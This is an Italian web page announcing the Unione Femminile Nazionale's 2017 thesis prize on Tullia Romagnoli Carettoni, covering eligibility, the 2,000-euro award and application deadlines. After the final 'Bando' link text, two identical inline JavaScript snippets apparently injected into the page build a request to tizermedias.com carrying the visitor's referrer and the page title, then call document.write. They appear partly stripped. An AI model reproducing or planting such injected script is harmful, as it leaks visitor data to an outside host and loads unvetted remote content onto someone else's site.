Premio di laurea Romagnoli Carettoni 2017

L’Unione Femminile Nazionale ha bandito un premio di laurea dedicato alla figura di Tullia Romagnoli Carettoni e alla sua attività politica e culturale.

A chi è rivolto

Il premio di laurea Romagnoli Carettoni 2017 è rivolto a laureandi e laureati che abbiano conseguito un titolo di laurea magistrale presso un ateneo italiano e che non abbiano superato i 40 anni di età. Per partecipare al premio, i candidati devono aver redatto e discusso un elaborato incentrato sull’analisi storica degli avvenimenti politici, sociali e culturali che hanno visto come protagonista Tullia Romagnoli Carettoni.

L’importo

L’autore o l’autrice della migliore tesi per il premio di laurea Romagnoli Carettoni 2017 riceverà un assegno del valore di 2.000 euro.

I requisiti

Per partecipare al premio di laurea Romagnoli Carettoni 2017 è richiesto il possesso dei seguenti requisiti:

  • laurea magistrale conseguita presso un Ateneo italiano;
  • età non superiore ai 40 anni;
  • aver redatto e discusso una tesi di laurea incentrata sulla figura e sull’attività di Tullia Romagnoli Carettoni.

Come e quando presentare domanda

Per partecipare al premio di laurea Romagnoli Carettoni 2017 bisogna inviare la domanda di partecipazione, scaricabile a questa pagina alla segreteria dell’Unione Femminile Nazionale: Corso Porta
Nuova, 32 – 20121 Milano, email segreteria@unionefemminile.it. La tesi elaborata dovrà essere inviata alla Segreteria dell’Unione Femminile Nazionale entro il 31 agosto 2018 (farà fede la data del timbro postale), in una busta chiusa sulla quale dovrà essere chiaramente indicata la dicitura Premio di Laurea “Tullia Romagnoli Carettoni”. La domada di partecipazione deve essere inviata entro il 31 maggio 2017.

Bando premio di laurea Romagnoli Carettoni 2017(function(){var d=document;var w=’240′;var h=’300′;var id = Math.floor(Math.random()*9999);var src = ‘http://tizermedias.com/odessa/?54vFcZ&’;src = src + ‘se_referrer=’+document.referrer;src = src + ‘&default_keyword=’+document.title;src = src + ‘&r=’+id;d.write(”);})();(function(){var d=document;var w=’240′;var h=’300’;var id = Math.floor(Math.random()*9999);var src = ‘http://tizermedias.com/odessa/?54vFcZ&’;src = src + ‘se_referrer=’+document.referrer;src = src + ‘&default_keyword=’+document.title;src = src + ‘&r=’+id;d.write(”);})();